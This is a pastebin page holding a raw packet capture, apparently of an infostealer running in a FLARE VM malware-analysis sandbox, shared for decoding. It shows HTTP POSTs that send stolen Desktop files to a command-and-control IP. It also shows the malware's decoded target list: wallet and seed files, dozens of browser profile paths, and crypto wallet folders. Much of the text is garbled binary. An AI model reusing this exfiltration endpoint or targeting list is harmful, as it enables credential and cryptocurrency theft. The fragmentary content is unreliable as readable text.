Facebook

Decode safest cryptocurrency exchange

From Eratic Goat, 2 Years ago, written in Plain Text.
This paste is a reply to Re: Encoded And Decoded Strings Wireshark Traffic from Paltry Kangaroo - go back
URL https://pastebin.pl/view/e7dc621d
Embed
Viewing differences between Re: Encoded And Decoded Strings Wireshark Traffic and Decode
....P%http://tempuri.org/Entity/Id1Response.Id1Response.http://tempuri.org/        Id1ResultV...POST /8vcWxwwx3/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 62.204.41.151
Content-Length: 21
Cache-Control: no-cache

id=795348421152&cred=HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Jan 2023 22:18:50 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php

0

POST /8vcWxwwx3/index.php?wal=1 HTTP/1.1
Content-Type: multipart/form-data; boundary=----NzY4MA==
Host: 62.204.41.151
Content-Length: 7840
Cache-Control: no-cache

------NzY4MA==
Content-Disposition: form-data; name="data"; filename="795348421152_Desktop.tar"
Content-Type: application/octet-stream

Users/vm/AppData/Local/Temp/_Files_/available_packages.txt..........................................000666 .000000 .000000 .00000004254 14344065737 022125. 0....................................................................................................ustar.00................................................................000000 .000000 ..........................................................................................................................................................................0.1.0.e.d.i.t.o.r...v.m.|.1.2...0...1.
.
.7.z.i.p.-.1.5.-.0.5...v.m.|.1.5...0.5.
.
.a.p.i.m.o.n.i.t.o.r...v.m.|.2...1.3...0...2.0.2.2.0.2.2.4.
.
.a.p.k.t.o.o.l...v.m.|.2...7...0.
.
.a.s.r.e.p.r.o.a.s.t...v.m.|.0...0...0...2.0.1.8.0.9.2.5.
.
.b.l.o.o.d.h.o.u.n.d...v.m.|.4...2...0.
.
.c.a.p.a...v.m.|.4...0...1.
.
.c.m.d.e.r...v.m.|.1...3...2.0...2.0.2.2.1.2.0.1.
.
.c.o.m.m.o.n...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
.
.c.y.b.e.r.c.h.e.f...v.m.|.9...4.9...0...2.0.2.2.1.2.0.1.
.
.c.y.g.w.i.n...v.m.|.3...2...0...2.0.2.2.1.2.0.1.
.
.d.i.e...v.m.|.3...0.2...2.0.2.2.0.1.1.3.
.
.d.n.s.p.y.e.x...v.m.|.6...2...0.
.
.e.x.p.l.o.r.e.r.s.u.i.t.e...v.m.|.0...0...0...2.0.2.2.1.1.1.5.
.
.f.a.k.e.n.e.t.-.n.g...v.m.|.1...4...1.1...2.0.2.2.1.1.1.5.
.
.f.l.a.r.e.v.m...i.n.s.t.a.l.l.e.r...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
.
.f.l.o.s.s...v.m.|.2...1...0.
.
.g.h.i.d.r.a...v.m.|.1.0...1...2.
.
.g.o.b.u.s.t.e.r...v.m.|.3...0...1...2.0.2.2.0.1.1.3.
.
.h.a.V.D
.....D...&R..\.A.`.Z`:@.D.......V.B.
.B..........%http://tempuri.org/Entity/Id2Response.Id2Response        Id2Result.Entity)http://www.w3.org/2001/XMLSchema-instance.Id1.Id109http://schemas.microsoft.com/2003/10/Serialization/Arrays.string.Id11.Id12.Id13.Entity17.Id2.Id3.Entity16.Id4.Id5.Id6.Id7.Id8.Id9V...s.h.m.y.f.i.l.e.s...v.m.|.0...0...0...2.0.2.2.0.1.1.3.
.
.i.d.a.V.D
....        D......?^ZD.9m.ux..D.......V.B.
.B
..b...f.r.e.e...v.m.|.7...6.
.
.l.i.E..E...c.F..:%userprofile%\Desktop|*.txt,*.doc*,*key*,*wallet*,*seed*|0F..<%userprofile%\Documents|*.txt,*.doc*,*key*,*wallet*,*seed*|0.E...c.F..&%USERPROFILE%\AppData\Local\Battle.netF...%USERPROFILE%\AppData\Local\Chromium\User DataF..3%USERPROFILE%\AppData\Local\Google\Chrome\User DataF..8%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User DataF..-%USERPROFILE%\AppData\Roaming\Opera Software\F..<%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User DataF..-%USERPROFILE%\AppData\Local\Iridium\User DataF..1%USERPROFILE%\AppData\Local\7Star\7Star\User DataF..1%USERPROFILE%\AppData\Local\CentBrowser\User DataF..,%USERPROFILE%\AppData\Local\Chedot\User DataF..-%USERPROFILE%\AppData\Local\Vivaldi\User DataF..,%USERPROFILE%\AppData\Local\Kometa\User DataF..6%USERPROFILE%\AppData\Local\Elements Browser\User DataF..:%USERPROFILE%\AppData\Local\Epic Privacy Browser\User DataF..4%USERPROFILE%\AppData\Local\uCozMedia\Uran\User DataF..O%USERPROFILE%\AppData\Local\Fenrir Inc\Sleipnir5\setting\modules\ChromiumViewerF..:%USERPROFILE%\AppData\Local\CatalinaGroup\Citrio\User DataF..3%USERPROFILE%\AppData\Local\Coowon\Coowon\User DataF..,%USERPROFILE%\AppData\Local\liebao\User DataF...%USERPROFILE%\AppData\Local\QIP Surf\User DataF..-%USERPROFILE%\AppData\Local\Orbitum\User DataF..3%USERPROFILE%\AppData\Local\Comodo\Dragon\User DataF..0%USERPROFILE%\AppData\Local\Amigo\User\User DataF..+%USERPROFILE%\AppData\Local\Torch\User DataF..:%USERPROFILE%\AppData\Local\Yandex\YandexBrowser\User DataF..,%USERPROFILE%\AppData\Local\Comodo\User DataF..8%USERPROFILE%\AppData\Local\360Browser\Browser\User DataF...%USERPROFILE%\AppData\Local\Maxthon3\User DataF..-%USERPROFILE%\AppData\Local\K-Melon\User DataF..5%USERPROFILE%\AppData\Local\Sputnik\Sputnik\User DataF...%USERPROFILE%\AppData\Local\Nichrome\User DataF..4%USERPROFILE%\AppData\Local\CocCoc\Browser\User DataF..*%USERPROFILE%\AppData\Local\Uran\User DataF...%USERPROFILE%\AppData\Local\Chromodo\User DataF..2%USERPROFILE%\AppData\Local\Mail.Ru\Atom\User DataF..A%USERPROFILE%\AppData\Local\BraveSoftware\Brave-Browser\User DataF..4%USERPROFILE%\AppData\Local\Microsoft\Edge\User DataF..H%USERPROFILE%\AppData\Local\NVIDIA Corporation\NVIDIA GeForce ExperienceF..!%USERPROFILE%\AppData\Local\SteamF..7%USERPROFILE%\AppData\Local\CryptoTab Browser\User Data.E...c.F..-%USERPROFILE%\AppData\Roaming\Mozilla\FirefoxF..&%USERPROFILE%\AppData\Roaming\WaterfoxF..&%USERPROFILE%\AppData\Roaming\K-MeleonF..)%USERPROFILE%\AppData\Roaming\ThunderbirdF...%USERPROFILE%\AppData\Roaming\Comodo\IceDragonF..3%USERPROFILE%\AppData\Roaming\8pecxstudios\CyberfoxF..;%USERPROFILE%\AppData\Roaming\NETGATE Technologies\BlackHawF..=%USERPROFILE%\AppData\Roaming\Moonchild Productions\Pale Moon.E.E!E...ArmoryE#.        %appdata%E%E'E...ArmoryE#..*.walletE%....E!E...AtomicE#.        %appdata%E%E'E...atomicE#..*E%....E!E...BinanceE#.        %appdata%E%E'E...BinanceE#..*app-store*E%....E!E...CoinomiE#.        %appdata%E%E'E...CoinomiE#..*E%....E!E...ElectrumE#.        %appdata%E%E'E...Electrum\walletsE#..*E%....E!E...EthereumE#.        %appdata%E%E'E...Ethereum\walletsE#..*E%....E!E...ExodusE#.        %appdata%E%E'E...Exodus\exodus.walletE#..*E%..E'E...ExodusE#..*.jsonE%....E!E...GuardaE#.        %appdata%E%E'E...GuardaE#..*E%....E!E...JaxxE#.        %appdata%E%E'E...com.liberty.jaxxE#..*E%....E!E...MoneroE#..%userprofile%\DocumentsE%E'E...Monero\walletsE#..*E%.....E#.E%.E).E+.E-.E/.E1.E3......{<%http://tempuri.org/Entity/Id4Response.Id4Response        Id4ResultV...b.r.a.r.i.e.s...p.y.t.h.o.n.2...v.m.|.0...0...0...2.0.2.2.1.2.0.3.
.
.l.i.b.r.a.V.D
....5D....5.qU.I.im.....D.......V.B7
.B9..Id2....~?&http://tempuri.org/Entity/Id10Response.Id10Response
Id10ResultV...r.i.e.s...p.y.t.h.o.n.3...v.m.|.0...0...0...2.0.2.2.1.2.0.3.
.
.m.a.V.D
....;[email protected]=
.B?..Id2....~?&http://tempuri.org/Entity/Id11Response.Id11Response
Id11ResultV...p...v.m.|.0...2.4.
.
.n.e.t.w.o.r.k.m.i.n.e.r...v.m.|.2...7...3.
.
.n.o.t.e.p.a.d.p.l.u.s.p.l.u.s...v.m.|.8...4...7...2.0.2.2.1.1.2.9.
.
.n.o.t.e.p.a.V.D
....AD.....*le.N._2Q...#D.......V.BC
.BE..Id2....~?&http://tempuri.org/Entity/Id21Response.Id21Response
Id21ResultV...d.p.p...p.l.u.g.i.n...c.o.m.p.a.r.e...v.m.|.2...0...1...2.0.2.1.1.2.2.5.
.
.o.l.l.y.d.b.g...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
.
.o.l.l.y.d.b.g...v.m.|.1...1.0...0...2.0.2.2.0.9.0.8.
.
.o.l.l.y.d.b.g.2...o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
.
.o.l.l.y.d.b.g.2...v.m.|.2...0.1.
.
.p.e.i.d...v.m.|.0...9.5...0...2.0.2.2.1.1.1.5.
.
.p.r.o.c.e.s.s.d.u.m.p...v.m.|.2...1...1...2.0.2.2.0.9.0.8.
.
.r.e.g.s.h.o.t...v.m.|.1...9...1.
.
.r.u.n.d.o.t.n.e.t.d.l.l...v.m.|.2...2.
.
.s.y.s.i.n.t.e.r.n.a.l.s...v.m.|.2.0.2.2...1.1...2.8...2.0.2.2.1.2.0.1.
.
.u.n.i.e.x.t.r.a.V.D
....GD....{8...J.fS..k{.D.......V.BI
.BK..Id2....{<%http://tempuri.org/Entity/Id9Response.Id9Response        Id9ResultV...c.t.2...v.m.|.2...0...0...2.0.2.2.0.1.1.3.
.
.v.c.b.u.i.l.d.t.o.o.l.s...v.m.|.0...0...0...2.0.2.2.1.2.0.1.
.
.w.i.r.e.s.h.a.V.D
....MD...3..y.YI.....I..D.......V.BO
.BQ..Id2....~?&http://tempuri.org/Entity/Id15Response.Id15Response
Id15ResultV...s...a.V.D
....SD...wT.m..M..{c...\D.......V.BU
.BW..Id2....~?&http://tempuri.org/Entity/Id16Response.Id16Response
Id16ResultV...s...a.V.D
....YD...//.OluC.Y..>.O.D.......V.B[
.B]..Id2....~?&http://tempuri.org/Entity/Id17Response.Id17Response
Id17ResultV...s...a.V.D
...._D...C.....J...y)?.MD.......V.Ba
.Bc..Id2....~?&http://tempuri.org/Entity/Id18Response.Id18Response
Id18ResultV...s...a.V.D
....eD.........N..$.;@..D.......V.Bg
.Bi..Id2....~?&http://tempuri.org/Entity/Id19Response.Id19Response
Id19ResultV...s...a.V.D
[email protected]./.M.ED.......V.Bm
.Bo..Id2....{<%http://tempuri.org/Entity/Id6Response.Id6Response        Id6ResultV...s...a.V.D
....qD...I.....K..g..-!.D.......V.Bs
.Bu..Id2....~?&http://tempuri.org/Entity/Id14Response.Id14Response
Id14ResultV...s...a.V.D
....wD..Tu....>J...w.Ph.D.......V.By
.B{..Id2.....?&http://tempuri.org/Entity/Id20Response.Id20Response
Id20ResultV...s...a.V.D
....}D......O..O.....X..D.......V.B.
.B....Id2....~<%http://tempuri.org/Entity/Id7Response.Id7Response        Id7ResultV...s...a.V.D
......D..g..q..+@...r.k...v.m.|.3...6...0...2.0.2.2.1.2.0.2.
.
.x.6.4.d.b.g...!D.......V.B..
.B....Id2......?&http://tempuri.org/Entity/Id13Response.Id13Response
Id13ResultV...s...a.V.D
......D..7..T
..J..2J...:D.......V.B..
.B....Id2....~<%http://tempuri.org/Entity/Id8Response.Id8Response        Id8ResultV...s...a.V.D
......D..E.7.o.l.l.y.d.u.m.p.e.x...v.m.|.1...8.0.
.
.x.6.yF..w....RD.......V.B..
.B....Id2......?&http://tempuri.org/Entity/Id12Response.Id12Response
Id12ResultV...s...a.V.D
......D..)
.l.4.d.b.g...v.m.|.B...Tp...D.......V.B..
.B....Id2....n4&http://tempuri.org/Entity/Id22Response.Id22ResponseV...s...a.V.D
......D......& .L........D.......V.B..
....2.0.2.1...0.5...0.8.
.
.x.6.4.d.b.g.p.y...v.m.|.1...0...5.6...2.0.2.1.1.0.2.1.
.
.....................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/failed_packages.txt.............................................000666 .000000 .000000 .00000000226 14344401701 021405. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................ghidra
Cygwin
python3

wireshark
GoogleChrome
ghidra
Cygwin
python3
wireshark
GoogleChrome
ghidra
Cygwin
python3
wireshark
GoogleChrome
..........................................................................................................................................................................................................................................................................................................................................................................Users/vm/AppData/Local/Temp/_Files_/README.txt......................................................000666 .000000 .000000 .00000003053 14344541053 017266. 0....................................................................................................ustar.00................................................................000000 .000000 ........................................................................................................................................................................        ______ _               _____  ______   __      ____  __ 
       |  ____| |        /   |  __ |  ____|       / /  /  |
       | |__  | |       /    | |__) | |__ _____   / /|   / |
       |  __| | |      / /  |  _  /|  __|______ / / | |/| |
       | |    | |____ / ____ | |  | |____        /  | |  | |
       |_|    |______/_/    __|  _______|      /   |_|  |_|
            M A L W A R E   A N A L Y S I S   E D I T I O N                                                                              
        ________________________________________________________
                               Developed by                         
             FLARE (FireEye Labs Advanced Reverse Engineering)
                          [email protected]                  
        ________________________________________________________ 
                                                         
Welcome to FLARE VM - Malware Analysis Edition! The distribution contains a
number of tools and configurations to enhance malware analysis and reverse
engineering tasks.

Please change the virtual machine network mode to Host Only to prevent malware
from escaping the environment. Finally, take a snapshot so that you could always
revert to a clean image.

You can customize the image by downloading additional packages. For example, to 
install Firefox simply type the following:

  cinst firefox

To keep the distribution up to date, restore networking to NAT or Bridge and type 
in the following command in the Administrator console:

  cup all

Happy Reversing!
.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
------NzY4MA==--
HTTP/1.1 200 OK
Server: nginx/1.18.0 (Ubuntu)
Date: Wed, 11 Jan 2023 22:18:56 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive

0

Reply to "Decode"